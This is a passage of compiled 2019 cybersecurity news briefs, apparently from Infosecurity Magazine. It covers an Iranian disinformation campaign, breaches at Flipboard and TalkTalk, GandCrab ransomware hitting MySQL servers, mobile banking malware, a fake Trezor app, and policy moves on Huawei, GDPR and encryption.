  • Nearly 50% of respondents noted having downtime for two to three days.
  • Just under a third experienced downtime for four to five days.

Pro-Iran Campaign Spread Fake News During Mid-Terms

Pro-Iran Campaign Spread Fake News During Mid-Terms

Security researchers have uncovered a major new state-sponsored Iranian influence campaign using dozens of fake news sites and hundreds of spoofed social media accounts in an attempt to manipulate public opinion.

Most of the accounts in question were created between April 2018 and March 2019 and used to spread inauthentic content from sites such as Liberty Front Press (LFP), US Journal, and Real Progressive Front during the US mid-terms, according to FireEye.

Some included profile pics lifted from social media users with the same name, and some described themselves as activists, correspondents, or “free journalist” in their profile.

Others even impersonated US political candidates, such as Republicans Marla Livengood and Jineea Butler. In the latter cases, those behind the scenes plagiarize some of their legitimate tweets and then add in pro-Iranian content.

The content promoted by these accounts was overwhelmingly pro-Iranian, pro-Palestinian and anti-Saudi, anti-Israeli. However, a small percentage of messages were anti-Iran, possibly to add legitimacy to them and/or to draw in those with opposing views who can then be targeted with messages in support of the Islamic Republic.

Interestingly, the campaign appears to have extended to legitimate print and online media sources via guest columns, letters and blog posts republished on these platforms. In some cases, the text for separate articles penned by 'different' individuals was almost identical, or had the same narrative. Most appeared in small local US news outlets.

FireEye said the content was in line with “Iranian political interests in a manner similar to accounts that we have previously assessed to be of Iranian origin.” However, definitive attribution is difficult, especially as most of the accounts have now been suspended.

“Apart from the narratives and messaging promoted, we observed several limited indicators that the network was operated by Iranian actors. For example, one account in the network, @AlexRyanNY, created in 2010, had only two visible tweets prior to 2017, one of which, from 2011, was in Persian and of a personal nature,” FireEye continued.

“Subsequently in 2017, @AlexRyanNY claimed in a tweet to be ‘an Iranian who supported Hillary’ in a tweet directed at a Democratic political strategist. This account, using the display name ‘Alex Ryan’ and claiming to be a Newsday correspondent, appropriated the photograph of a genuine individual also with the first name of Alex.”

In addition, while most accounts in this network had their language set to English, one was set to Persian, the vendor revealed.

Flipboard Breached in Nine-Month Raid

Flipboard Breached in Nine-Month Raid

Flipboard has reset all customer passwords as a precaution after revealing that hackers had unauthorized access to user data for over nine months.

The news aggregator site, which has around 150 million monthly users, said the “unauthorized person” gained access to “certain Flipboard users account information,” although it didn’t reveal how many were affected.

“Findings from the investigation indicate an unauthorized person accessed and potentially obtained copies of certain databases containing Flipboard user information between June 2, 2018 and March 23, 2019 and April 21 – 22, 2019,” it said in a statement.

“The databases involved contained some of our users’ account information, including name, Flipboard username, cryptographically protected password and email address.”

The good news is that Flipboard protected passwords with salted hashing, making it harder but not impossible for attackers to crack them. However, those credentials created or changed before March 14, 2012 are only salted and hashed with SHA-1, a less secure algorithm than the current bcrypt.

“Additionally, if users connected their Flipboard account to a third-party account, including social media accounts, then the databases may have contained digital tokens used to connect their Flipboard account to that third-party account,” the firm added.

“We have not found any evidence the unauthorized person accessed third-party account(s) connected to users’ Flipboard accounts. As a precaution, we have replaced or deleted all digital tokens.”

No financial information or Social Security numbers were affected by the breach, and the firm claimed to have “enhanced” its security following the incident.

Although it followed best practices regarding user passwords, the fact that hackers managed to stay hidden for nine months will be of concern to users.

Huawei Files New Motion Against Federal Ban

Huawei Files New Motion Against Federal Ban

Huawei has filed a new motion in its case to have a federal ban on its equipment declared unconstitutional, as the firm continues its PR offensive.

The Shenzhen giant filed for a “summary judgement” as part of a case launched in March to challenge the constitutionality of Section 889 of the 2019 National Defense Authorization Act (2019 NDAA).

That law explicitly bans government agencies from doing business with Huawei or other third parties that use its kit.

The new motion will look to speed up the judgement process without the need for a full trial, which experts reportedly say may also be a tactical move designed to avoid the firm having to hand over sensitive company documents as part of legal discovery.

“The U.S. government has provided no evidence to show that Huawei is a security threat. There is no gun, no smoke. Only speculation,” Huawei chief legal officer, Song Liuping, said in a statement.

“The judicial system is the last line of defense for justice. Huawei has confidence in the independence and integrity of the U.S. judicial system. We hope that mistakes in the NDAA can be corrected by the court.”

The federal ban is just one of a series of recent legal moves designed to shut Huawei out from the US market and impact its ability to operate freely.

Most recently, a Presidential executive order issued earlier this month effectively extended the ban to all US companies, although it did not name Huawei and China by name.

The same day, the Commerce Department put the firm on an Entity List, which means US firms that sell key components like chips to Huawei must stop doing so from around 90 days’ time.

A hearing on the new motion is set for September 19.

Cryptopia Fights to Keep Data Held by Arizona Firm

Cryptopia Fights to Keep Data Held by Arizona Firm

Cryptopia, an exchange that was hacked and subsequently went into liquidation in May, has filed for bankruptcy protection in the United States. Grant Thornton will be handling the preservation of the data stored and hosted on servers with an Arizona-based firm, according to Yahoo News

The bankruptcy court in the Southern District of New York issued an order to Cryptopia on Friday, granting an emergency motion for provisional relief till June 7. However, the Arizona company that runs the servers has severed ties with the exchange and is requesting $2 million be paid, according to Bloomberg. If Cryptopia doesn't pay the company, the data could be overwritten or lost.

The New Zealand–based exchange operated with 300,000 accounts from across the globe. It filed for U.S. bankruptcy protection after hackers stole over $16 million earlier this year. Bloomberg reports that every account holder is a potential creditor in the liquidation, with trade creditors owed about $2.6 million. 

“The interim order preserves the Cryptopia data, which includes a SQL database containing all account holders’ individual holdings of cryptocurrencies and the account holder contact details," said Grant Thornton. "Without this information, reconciling individual holdings with the currencies held by Cryptopia will be impossible.”

On its website, Cryptopia said, "On Friday 24 May 2019, we filed a petition in the Bankruptcy Court in the Southern District of New York (SDNY) seeking recognition of the New Zealand liquidation in the USA, and we also applied for urgent interim relief. We took these steps to preserve the Cryptopia information that is stored and hosted on servers with an Arizona based business.

"Our objective is to protect and to preserve those holdings for the benefit of those entitled to them. We expect that the process of recovering data and determining how to make distributions to account holders will take some months at least. 

"We understand that this delay will be frustrating for account holders. For that reason, we are working to resolve these issues as soon as reasonably practicable."

All trading on the Cryptopia exchange has been suspended, meaning that users cannot deposit or withdraw crypto assets.

Germany Seeks Access to Encrypted Messages on WhatsApp, Telegram

Germany Seeks Access to Encrypted Messages on WhatsApp, Telegram

Germany's federal interior minister, Horst Seehofer, wants companies such as WhatsApp and Telegram to give security authorities access to end-to-end encrypted messages or calls. Not complying with this could end with companies being banned by the Federal Network Agency. 

The latest issue of Der Spiegel reports that Seehofer wants the order to be implemented quickly, especially with the move to 5G potentially causing "complications" for security authorities. This comes after WhatsApp had to fix its app due to a remote code execution (RCE) vulnerability, which may have been exploited by a national-state. 

As Infosecurity reported at the time, the Facebook-owned mobile communication giant, with 1.5 billion users, rolled out a fix on the vulnerability that allowed users to be infected with spyware by being phoned by the attacker. 

5G itself has also been a controversial topic recently, with an FBI agent citing that the technology would lead to "an explosion in cybersecurity risks." Experts in Europe have also called for 5G to be provided with end-to-end encryption. 

Additionally, Germany has had dealings with WhatsApp's parent company, Facebook, this year. Its antitrust watchdog, the Federal Cartel Office, banned the technology company from combining data collected from its social platform without user consent, according to Forbes.

Andreas Mundt, president of the Federal Cartel Office, said, "Facebook will no longer be allowed to force its users to agree to the practically unrestricted collection and assigning of non-Facebook data to their Facebook user accounts."

Fredericton, New Brunswick, Makes Its Cybersecurity Bulletproof

Fredericton, New Brunswick, Makes Its Cybersecurity Bulletproof

The city of Fredericton, New Brunswick, has agreed to pay C$100,000 (almost $75,000) to cybersecurity company, Bulletproof Solutions, to strengthen its network and protect it from cyber-attacks. The three-year agreement was approved at the city council meeting on Monday, May 27, 2019. 

The city's assistant director of finance, innovation and technology, Adam Bell, believes that this move will help protect against the rise of municipality attacks. This follows a cyber-attack that hit the city of Stratford, Ontario, in April, which affected the city's email system and online forms. 

According to Akamai and the Canadian Internet Registration Authority's (CIRA) Fall 2018 Cybersecurity Report, 40 percent of respondents experienced a cyber-attack in the previous 12 months, with large businesses seeing 66 percent. Fredericton joins around two-thirds of Canadian businesses that outsource part of the cybersecurity footprint to external vendors.

However, 88 percent of Canadian employees of these companies are concerned with the prospect of future cyber-attacks. Perhaps they are right to be: 37 percent of companies don't have anti-malware protection installed, and nearly 75 percent did not have a formal patching policy, which exposes organizations to massive security holes.

"A key element of building a better online Canada is ensuring Canadians have safe, secure internet access," president and CEO of CIRA, Byron Holland, said. In the introduction of the Akamai report, Holland explains that hackers will be attracted to companies with a lot of personal data, such as a government organization, because they can make money from it on the dark web. 

"Personal information is being sold on the dark web for as little as $5 for a credit card number, $30 for an entire identity, or up to $1,000 for medical records. There are hundreds of examples of low hanging fruit for hackers in everyday interactions Canadians have with businesses every day. All these situations are potential breaches and many businesses don’t even know the risks."

The upgrade was approved the same day Fredericton hosted its hackathon to find internet of things solutions for the city. 

GandCrab Campaign Attacks MySQL Servers

GandCrab Campaign Attacks MySQL Servers

Thousands of organizations running MySQL may have been infected with the infamous GandCrab ransomware after researchers spotted a new campaign targeting the open source database.

Sophos principal researcher, Andrew Brandt, explained in a blog post that the British security firm spotted the attack via a honeypot set up to monitor port 3306, used for SQL servers.

It scanned for unsecured databases running on Windows servers.

Interestingly, while the IP address of the machine hosting GandCrab geolocated to Arizona, the user interface of the server software (HFS) running on it was set to simplified Chinese, hinting at the origins of the perpetrator.

That server hosted five Windows executables with file names starting “3306,” and also provided useful stats on the campaign so far.

“The server appears to indicate more than 500 downloads of the sample I saw the MySQL honeypot download (3306-1.exe). However, the samples named 3306-2.exe, 3306-3.exe, and 3306-4.exe are identical to that file. Counted together, there has been nearly 800 downloads in the five days since they were placed on this server, as well as more than 2300 downloads of the other (about a week older) GandCrab sample in the open directory,” explained Brandt.

“So while this isn’t an especially massive or widespread attack, it does pose a serious risk to MySQL server admins who have poked a hole through the firewall for port 3306 on their database server to be reachable by the outside world.”

MySQL has a market share of over 50%, putting many organizations at potential risk of a damaging GandCrab infection.

The ransomware has been used in an increasingly targeted manner over recent months, with hackers trying out different threat vectors in a bid to outwit defenses.

In February it was spotted as the payload in a campaign targeting MSPs via a two-year-old flaw in a third-party plug-in for remote management software.

As of March 2018, GandCrab had infected over 50,000 victims and extorted an estimated $300,000-600,000, with over 70% of victims based in the US and UK, according to Check Point.

Aussie Teen Hacked Apple in Hope of Job Offer

Aussie Teen Hacked Apple in Hope of Job Offer

An Australian boy who hacked Apple when he was just 13 did so in a misguided attempt to get a job with the tech giant, a court has heard.

The schoolboy, who is now 17, pleaded guilty to multiple cybercrime offenses after hacking Apple in December 2015 and early 2017 and making off with internal data, according to local reports.

His actions were reported to the FBI, which subsequently contacted the Australian Federal Police.

The boy’s lawyer, Mark Twiggs, told Adelaide Youth Court that his client is now very remorseful.

“This offending started when my client was 13 years of age, a very young age. He had no idea about the seriousness of the offence and hoped that when it was discovered that he might gain employment at this company,” he’s reported as saying.

“He didn't know this was going to lead to anything other than a job at the end of it, [this] happened in Europe, a similar person got caught and they ended up getting employed by the company.”

The magistrate appears to have agreed, putting the boy on a AU$500 good behavior bond for nine months.

“He is clearly someone who is a gifted individual when it comes to information technology, that being said, those who have this advantage of being gifted doesn't give them the right to abuse that gift," he said.

“You must remain on the straight and narrow and use your gifts for good rather than evil.”

It’s unclear what data the individual stole from Apple, but the firm’s spokesperson confirmed that the incidents were promptly contained and that no customer information was involved.

Japan to Restrict Foreign Tech Investment on Security Fears

Japan to Restrict Foreign Tech Investment on Security Fears

The Japanese government is set to restrict foreign ownership of domestic firms in key tech areas on national security grounds, in a move which echoes America’s recent attempts to restrict Chinese companies.

Announced on Monday, the new rules will add the manufacturing of chips, telecoms equipment, mobile phones and other sectors to already restricted areas like nuclear equipment and arms.

From August 1, foreign companies wanting to buy more than 10% of a Japanese firm in one of 20 IT-related sectors will need prior approval from the government, according to updates to the foreign exchange and foreign trade control law.

“The importance of securing cybersecurity has been increasing in recent years for the industry pertaining to specific acquisitions … that require prior notification based on the provision of Article 28 paragraph 1 of the Act,” the government noted.

“In view of the appropriate prevention of situations that may seriously affect Japan's security, such as the outflow of technology important for security and the loss of Japan's defense production and technology base, integrated circuit manufacturing industry, etc. we decided to take necessary measures.”

Although China is not named specifically, the order was issued as Prime Minister Shinzo Abe discussed trade with Donald Trump yesterday.

It could be viewed as an alignment with the tough stance taken by Washington on Middle Kingdom businesses, which it argues are a national security risk and unfairly subsidized by the Beijing.

In China, strict laws force foreign investors to partner with local companies if they want to enter its vast, lucrative market. This had led to accusations of forced tech transfers to the domestic firms, ultimately enabling the country and its hi-tech champions to catch-up with their Western rivals.

Earlier this month, a Presidential Executive Order effectively banned foreign companies deemed a national security threat from competing in the US market. A separate Entity List will prevent US firms from selling key components to Huawei once a temporary license expires in around 90 days.

Snapchat: Claims of Employees Spying “Inaccurate”

Snapchat: Claims of Employees Spying "Inaccurate"

In response to news that multiple Snapchat employees abused their privileged access to spy on users, reported by Motherboard, the social media platform said the allegations are false.

“Two former employees said multiple Snap employees abused their access to Snapchat user data several years ago. Those sources, as well as an additional two former employees, a current employee, and a cache of internal company emails obtained by Motherboard, described internal tools that allowed Snap employees at the time to access user data, including in some cases location information, their own saved Snaps and personal information such as phone numbers and email addresses,” Motherboard wrote on May 23.

Whether accurate or not, "the incident highlights the risks posed by insider threats. Most of the employees are busy doing their day-to-day jobs but a handful have malicious intent thus causing harm to the organizations they work for,” said Mayank Choudhary, senior vice president at ObserveIT.

“As in the case of Snapchat where a few users with elevated access were able to take their own and consumers’ data easily. Existing security controls did not pick this up, given most of the technology is focused on protecting the company from external threats. It’s high time that organizations focus on insider threats with platforms that help customers known the whole story, protect IP quickly, easily and reliably.”

However, the Motherboard report states that how any access might have been abused or which system was used remains unknown. Pointing out that the spying happened 'several years ago,' the story does note that one tool, SnapLion, is capable of accessing user data, according to multiple anonymous sources.

“Any perception that employees might be spying on our community is highly troubling and wholly inaccurate,” a Snapchat spokesperson wrote in an email to Infosecurity.

“Protecting privacy is paramount at Snap. We keep very little user data, and we have robust policies and controls to limit internal access to the data we do have, including data within tools designed to support law enforcement. Unauthorized access of any kind is a clear violation of the company's standards of business conduct and, if detected, results in immediate termination.”

Moody’s Downgrading of Equifax Is a Message to Boards

Moody's Downgrading of Equifax Is a Message to Boards

While affirming Equifax’s senior unsecured rating at Baa1 and short-term rating at Prime-2, Moody’s Investor Services downgraded the company’s outlook from stable to negative due to the 2017 cyber-attack.

“The outlook revision to negative reflects weaker operating performance and credit metrics than originally expected following the cybersecurity breach in 2017,” the May 17 rating action notice stated.

"Free cash flow may remain around only $150 million per year for a few years, or less than half of annual free cash flow prior to the breach," said Edmond DeForest, Moody's vice president and senior credit officer. "Diminished free cash flow limits Equifax's ability to reduce its financial leverage," he continued.

Infosecurity Magazine reached out to Equifax for comment in reaction to the news that was reported May 23 by CNBC. An Equifax spokesperson wrote in an email, “Moody’s affirmed our Baa1 senior unsecured rating and the short-term rating at Prime-2.  Any questions about the outlook change should be directed to Moody’s. EFX remains solidly investment grade and the revision in Moody’s outlook will not impact our internal investments, including new products, our $1.25bn EFX2020 technology and security advancements, or future acquisitions.”

According to CNBC, a Moody’s spokesperson said the downgrade is significant because “it is the first time that cyber has been a named factor in an outlook change.”

The news isn’t all that surprising to industry experts who have long been saying that cybersecurity is a boardroom issue. “Everyone is in business with a single goal, which is to make money. This includes the bad guys, except that they want to make their money by preventing someone else from doing the same,” said Laurence Pitt, strategic security director, Juniper Networks.

Because cyber-risk is integral to business risk, boards will likely see this downgrade as a clear message in a language they can understand, said Steve Durbin, managing director of the Information Security Forum.

“For quite some time, I have been encouraging both the insurance industry and credit rating agencies to take cyber risk into account when setting policy pricing and assessing company value. Moving forward, this should become the norm since cyber-risk is so integral to business risk that an assessment of business health without taking cyber risk and a company’s resilience into account will become meaningless. For the cybersecurity industry, this supports what many have been advocating for some time – that cyber is a business issue and must be taken seriously by boards.”

APT Increasingly Targets Canadian Orgs

APT Increasingly Targets Canadian Orgs

Canadian organizations are being warned that they are increasingly becoming the targets of cyber-threats, with researchers discovering nearly 100 malicious email campaigns that have been specifically targeting Canadian audiences, according to new research from Proofpoint.

The emails were customized for either Canadian organizations or a more general Canadian audience, a May 23 blog post said. One feature included in these malicious emails is the use of fraudulent branding from notable Canadian companies, researchers said. Malicious actors are also leveraging “French-language lures and geo-targeted imposter attacks for ensnaring corporate credentials and banking info.”

Historically Canada is included in threats targeting the entire North American region, though most of these threats are typically  focused on the US. Based on prior activity, researchers observed these campaigns believed to be the work of the advanced persistent threat (APT) group TA542.

“Much of this is due to Emotet. TA542, the primary actor behind Emotet, is known for the development of lures and malicious mail specific to given regions. However, we also saw customization ranging from French-language lures to brand abuse from a number of actors geo-targeting Canada,” according to the blog post.

Threat actors are also leveraging Ursnif, an information-stealing Trojan used largely to compromise online banking websites. In addition to Emotet and Ursnif, researchers are tracking activity involving other malware strains known as IcedID, The Trick, GandCrab, Danabot, Formbook and Dridex.

When it first appeared back in 2014, Emotet was mostly seen targeting Western European banks. In these more recent campaigns, “Proofpoint researchers observed stolen branding from several notable Canadian companies and agencies including major shipping and logistics organizations, national banks, and large government agencies. Top affected industries in Canada include financial services, energy/utilities, manufacturing, healthcare, and technology.”

Researchers warned that while these ubiquitous phishing attacks and business email compromises (BECs) may be targeting Canada in this particular campaign, “other forms of imposter attacks remain ongoing threats, both internationally and in Canada.”

GDPR: Security Pros Believe Non-Compliance is Rife

GDPR: Security Pros Believe Non-Compliance is Rife

Most IT security professionals believe GDPR non-compliance is commonplace, as the landmark data protection legislation turns one tomorrow, according to Infosecurity Europe.

Over 6400 industry practitioners responded to a Twitter poll run by the leading cybersecurity event, which runs from June 4-6.

Some 68% said they thought many organizations have likely not taken the GDPR seriously enough, while nearly half (47%) claimed regulators are being too relaxed when it comes to enforcement.

Recent research indicates that regulator the Information Commissioner’s Office (ICO) has investigated 11,468 data breach cases between May 2018 and March this year, but just 0.25% have led to monetary fines.

On the plus side, only a little over a third (38%) Infosecurity Europe respondents said GDPR compliance efforts had hindered other cybersecurity plans.

Mark Taylor, partner at Osborne Clarke, claimed that organizations are now turning their attention to the “practicalities of compliance,” but that complications are starting to emerge for multi-nationals.

“First, within a large group, it can be hard to accurately determine the various roles — i.e. data controller and data processor — which the group members have under GDPR. This is important because it determines the relative responsibilities of the group members, and which regulator has jurisdiction over them,” he explained.

“Second, the local laws supplementing GDPR across Europe have adopted variations of GDPR to a greater extent than we might have ideally hoped for. So while GDPR has made international compliance easier, it hasn’t unfortunately made it a one-size-fits-all approach everywhere.”

Taylor also argued that regulators in different jurisdictions are taking a different approach to enforcement.

“Looking forward, I think that enforcement activity will step up, with companies that are undertaking higher-risk processing likely to be most at risk,” he added.

IoT Attacks Cost UK Firms Over £1bn

IoT Attacks Cost UK Firms Over £1bn

Cyber-attacks on IoT devices could cost the UK economy over £1 billion each year, according to new research from Irdeto.

The Dutch security vendor polled IT security decision makers at UK organizations in the transport, manufacturing and health sectors, finding that attacks on connected kit caused losses of £244,000 on average.

Along with the headline costs, over half of respondents claimed to have suffered downtime in the past year as a direct result of IoT attacks. Two-fifths (41%) said customer data had been compromised in these raids.

This could present a major compliance challenge if GDPR regulators judge the victim organizations haven’t taken suitable steps to protect customer data. It could also lead to attrition: a third (33%) of respondents said they’d lost customers and 29% claimed their brand's reputation had taken a hit.

Attacks on IoT devices can also have an impact on the physical world, given the increasingly vital role they play in a range of sectors: from drug infusion pumps to connected cars.

Worryingly, 28% of organizations told Irdeto they suffered compromised end-user safety as a result of attacks in the cyber domain.

Irdeto VP of strategic partnerships, Steeve Huin, argued that unsecured IoT endpoints are like low-hanging fruit for cyber-criminals.

“It’s clear that, if not addressed, a lack of IoT security could pose a serious financial threat to the wider UK economy. With so many devices entering the market, and being deployed in critical businesses, the need for improved security measures is without question,” he added.

“Connected device manufacturers must move away from the traditional mindset of ‘build, ship and forget’ and ensure that devices are secure from the very point of design, incorporating multiple layers of security as well as offering regular health checks and software updates. If unsure, consumers should also ask their manufacturers about device security and appropriate measures to keep their information secure.”

This should be easier to do in the future, once the government has introduced a new law designed to improve IoT security.

Announced at the start of May, the proposals aim to improve baseline security standards among manufacturers, and require retailers to add a label to each product explaining whether it has met the standards or not.

Assange Hit with New 18-Count Indictment

Assange Hit with New 18-Count Indictment

The US authorities have slapped Julian Assange with a new 18-count indictment on charges relating to illegally obtaining, retaining and disclosing classified information via WikiLeaks.

The indictment supersedes an earlier charge of hacking the Pentagon, and has drawn criticism from advocates of press freedom.

It could also make the UK Home Secretary’s decision to extradite the Wikileaks co-founder more difficult, given that the revelations published by the whistle-blowing site were ostensibly done so in the public interest — something that Assange’s lawyers argue should be covered by the First Amendment anyway.

The charges relate to hundreds of thousands of secret diplomatic cables and other documents related to US wars in Afghanistan and Iraq.

They allege that the 47-year-old conspired with whistleblower Chelsea Manning, a former army intelligence analyst, to obtain and then publish the documents, harming national security.

Crucially, the published trove contained unredacted names of US informants in Iraq and Afghanistan, and US State Department ‘diplomats’ globally, potentially putting them at risk, the DoJ claimed.

It listed 90,000 Afghanistan war-related “significant activity” reports, 400,000 Iraq war-related reports, 800 Guantanamo Bay detainee assessment briefs, and 250,000 US Department of State cables.

The indictment also contains the original charge, that Assange agreed to crack a password hash stored on US Department of Defense computers connected to the Secret Internet Protocol Network (SIPRNet).

If found guilty, Assange faces 10 years behind bars for each count, amounting to a total of 175 years.

Last month, Assange was arrested at the Ecuadorian embassy in London after the Metropolitan Police were invited in following the Ecuadorian government’s termination of asylum. He had been holed up there since 2012 after breaching the terms of his bail.

LinkedIn Admits a Delay in Renewing TLS Cert

LinkedIn Admits a Delay in Renewing TLS Cert

LinkedIn users noticed on Tuesday that attempts to access the site from their desktop or laptop computer were met with an alert warning that the connection was not secure – the result of LinkedIn’s failure to renew the TLS certificate for its URL shortener, according to Computer Business Review (CBR).

It turned out that the company had what it is calling a brief delay in renewing the TLS certificate. The company quickly took action after being notified. “We had a brief delay in our SSL certification update yesterday, which was quickly fixed, and member data was not affected,” a LinkedIn spokesperson wrote in an email. The new certificate is valid until May 2021.

Forcepoint security analyst, Carl Leonard tweeted:

If you are wondering why your browser is throwing a Certificate Error when navigating around @LinkedIn posts their cert expired a few hours ago on the URL shortener lnkd[.]in. Qualys' SSL check report for that domain: …

Leonard and others noted that this is the second time that LinkedIn has allowed a certificate to expire. “Large organizations with hundreds of millions of users globally should be setting the standard for security practices and unfortunately this is the second time that LinkedIn failed to update their SSL certificate, effectively putting user data and privacy at risk,” Leondard reportedly told CBR.

"Certificates control communication and authentication between machines, so it's critically important not to let them expire unexpectedly. Unfortunately, most organizations don’t even have a clear understanding of how many certificates are in use or which devices are using them; so they definitely don't have a clear idea of when they will expire,” said Kevin Bocek, vice president of security strategy and threat intelligence at Venafi.

“This lack of comprehensive visibility and intelligence routinely leads to certificate-related outages; this is not a unique occurrence. Ultimately, companies must get control of all of their certificates; otherwise, it’s only a matter of time until one expires unexpectedly and causes a debilitating outage."

Mobile Banking Malware Rose 58% in Q1

Mobile Banking Malware Rose 58% in Q1

The first quarter of 2019 saw a significant spike in mobile banking malware that steals both credentials and funds from users’ bank accounts, according to researchers at Kaspersky Lab.

“In Q1 2019, Kaspersky Lab detected a 58% increase in modifications of banking Trojan families, used in attacks on 312,235 unique users. Banking Trojans grew not only in the number of different samples detected, but their share of the threat landscape increased as well. In Q4 2018, mobile banking Trojans accounted for 1.85% of all mobile malware; in Q1 2019, their share reached 3.24%,” today’s press release stated. 

Researchers reportedly uncovered 29,841 different modifications of banking Trojans during the first three months of the year, up from 18,501 in Q4 2018. “As is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using cloud technologies,” researchers wrote.

“Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected.”

The report also noted that a new version of Asacub malware, which was first noted in 2015, accounted for more than half of all banking Trojans that attacked users. Over the past two years, attackers have modified its distribution scheme, which resulted in a spike of the malware in 2018, when it was reportedly used to attack 13,000 users a day. Though distribution has since declined, the malware remains a significant threat, with researchers observing Asacub used to target 8,200 users a day on average.

“The rapid rise of mobile financial malware is a troubling sign, especially since we see how criminals are perfecting their distribution mechanisms,” said Victor Chebyshev, security researcher at Kaspersky Lab. “For example, a recent tendency is to hide the banking Trojan in a dropper – the shell that is supposed to fly to the device under the security radar, releasing the malicious part only upon arrival.”

Fake Trezor App in Google Play Scams Users

Fake Trezor App in Google Play Scams Users

Malicious actors have been using a new set of fake cryptocurrency apps on Google Play that are reportedly able to phish and scam users out of cryptocurrency, according to ESET researchers.

Researchers observed one app impersonating Trezor, a hardware cryptocurrency wallet. The app, called Coin Wallet – Bitcoin, Ripple, Ethereum, Tether, actually connects to a fake wallet, reportedly created on May 1, that scams unsuspecting users out of money. It appears as the second-most popular search on Google Play, according to researchers.

Bitcoin has seen growth this month, with prices inching back up to the $8,000 range. Cyber-criminals were quick to exploit this price boost and got to work targeting users with scams and malicious apps.

“We haven’t previously seen malware misusing Trezor’s branding and were curious about the capabilities of such a fake app. After all, Trezor offers hardware wallets that require physical manipulation and authentication via PIN, or knowledge of the so-called recovery seed, to access the stored cryptocurrency,” explained Lukáš Štefanko, the ESET researcher in a press release.

After analyzing the fake app, researchers noted that the fake Trezor app can’t cause harm to Trezor users because of Trezor’s multiple security layers; however, “it is connected to a fake cryptocurrency wallet app 'Coin Wallet, which is capable of scamming unsuspecting users out of money. Both these apps were created based on an app template sold online,” Štefanko added.

“The app claims it lets its users create wallets for various cryptocurrencies. However, its actual purpose is to trick users into transferring cryptocurrency into the attackers’ wallets – a classic case of what we’ve named 'wallet address scams' in our previous research into cryptocurrency-targeting malware,” said Štefanko.

ESET reported the fake Trezor app to both Google’s security teams and Trezor, which confirmed that the fake app did not pose a direct threat to their users. “However, they did express concern that the email addresses collected via fake apps such as this one could later be misused in phishing campaigns. At the time of writing, neither the fake Trezor app nor the Coin Wallet app are available on Google Play,” today’s press release stated.

UK Political Parties Fail on Email Security Ahead of Elections

UK Political Parties Fail on Email Security Ahead of Elections

The UK’s political parties are largely failing to protect their members from phishing attacks ahead of the European elections, a security vendor has claimed after revealing poor take-up of the DMARC protocol.

Domain-based Message Authentication, Reporting and Conformance, to give it its full title, is widely regarded as a best practice solution to help mitigate the threat of email impersonation.

Although not a silver bullet for email security, it helps to guarantee the legitimacy of the sender, which is why the UK government mandated its use for departments back in 2016, with the US following two years later.

However, according to analysis from Red Sift of all 22 main UK political parties participating in the European Parliament elections, only five had DMARC implemented.

These were the Lib Dems, Labour, the SNP, and two lesser known organizations: the Socialist Party and the Animal Welfare Party. That means the Conservatives, UKIP the Brexit Party and others are potentially putting their members at risk of phishing and other email scams.

However, even those that implemented DMARC are not quite there yet: Red Sift detected only “p=none” policies, which are the weakest form of the protocol. It amounts to little more than monitor mode, meaning recipients may still get phishing emails in their inbox — dubious messages are neither sent to the user’s spam folder nor rejected outright.

Randal Pinto, co-founder and COO at Red Sift, described the results of the firm’s analysis as “deplorable.”

“Let’s lay our cards out on the table, the World Economic Forum calls out phishing as the one of the most successful methods by which to carry out a cyber-attack, so at a time when election fraud and fake news are abound, surely politicians should be taking voter safety into consideration,” he added.

“To have all of the official UK political parties neglect this fundamental defense system is a worrying indicator of their willingness to protect their voters.”

The news follows another security audit of major political parties released this week by SecurityScorecard, which found Sweden’s parties topping the list, with the Liberal Democrats doing best in the UK.

TalkTalk Overlooked Nearly 5000 Customers in Breach Notification

TalkTalk Overlooked Nearly 5000 Customers in Breach Notification

A mishandled 2015 data breach continues to hound TalkTalk after it emerged that the UK telco failed to notify nearly 5000 customers that had been affected.

After being contacted by viewers who suspected their details had been stolen via the telco, consumer rights program Watchdog Live investigated.

It subsequently found their full names, addresses, email addresses, dates of birth, TalkTalk customer numbers, mobile numbers and bank details available on the dark web.

“A recent investigation has shown that 4545 customers may have received the wrong notification regarding this incident. This was a genuine error and we have since written to all those impacted to apologize — 99.9% of customers received the correct notification in 2015,” the firm told the BBC in a statement.

“On their own, none of the details accessed in the 2015 incident could lead to any direct financial loss.”

The latter may be technically true, but it gaslights the issue somewhat, as fraudsters are more than capable of using such details to impersonate their victims in order to elicit more information which could be monetized.

Affected customers told the show they have been the victim of frequent scam calls, while some have suffered attempted identity fraud which has impacted their credit rating.

The original incident involved the compromise of 157,000 customers, including bank account numbers and sort codes for over 15,000 of them.

It led to a £400,000 fine from regulator the ICO after it was found that attackers had exploited a simple SQL injection flaw in web pages that TalkTalk didn’t even know existed.

The firm was also widely criticized for its incident response, sending out confusing messages via a CEO not in possession of all the facts.

TalkTalk’s profits halved following the incident, with the firm paying £42m to cover incident response, external consulting and increasing call volumes as a result of a breach.

UK Invests £22m in Army Cyber Centers as Russian Threat Looms

UK Invests £22m in Army Cyber Centers as Russian Threat Looms

The UK government has been sharing cyber-intelligence with 16 NATO allies and others outside the alliance on coordinated Russian attempts to probe critical infrastructure and government networks for vulnerabilities, according to Jeremy Hunt.

The foreign secretary will say today at the NATO Cyber Defence Pledge Conference in London that the Kremlin is engaged in a global campaign designed to find IT flaws that could be exploited to cause damage.

“The challenge today is therefore to apply the eternal verities at the heart of NATO’s success to the alliance’s newest operational domain. And that means deterrence – strengthening our joint ability to deter those who would harm our citizens in cyberspace,” Hunt will reportedly say.

The conference is itself testament to the growing threat to member nations from Russian state-sponsored hackers, allowing sharing of best practices and intelligence to counter the rogue nation to the east.

Hunt will also reaffirm the right of NATO states to enact a “proportionate response” to any further attempts to meddle in democratic elections, even if they fall below the Article V threshold which states that an attack against a member nation is considered an attack on all 29 allies.

Cyber was recently added as a legitimate military domain by the alliance.

In related news, the UK government is set to invest £22m in new cyber-operations centers for the army.

Set to launch in 2020, the facility will aim to bridge the gap in capabilities between the security services and the military.

“These new cyber centers will allow the army and defense to transform the way we use data, at speed, so that we can compete with our adversaries in a way fit for the 21st century,” said major general Tom Copinger-Symes, general officer commanding force troops command.

“Combining artificial intelligence with our military analysts will help us better understand threats and exploit opportunities, in turn enabling us to get the truth out much more rapidly, quashing the noise of disinformation from our enemies.”

Fraud Attacks from Mobile Spiked 300% in Q1

Fraud Attacks from Mobile Spiked 300% in Q1

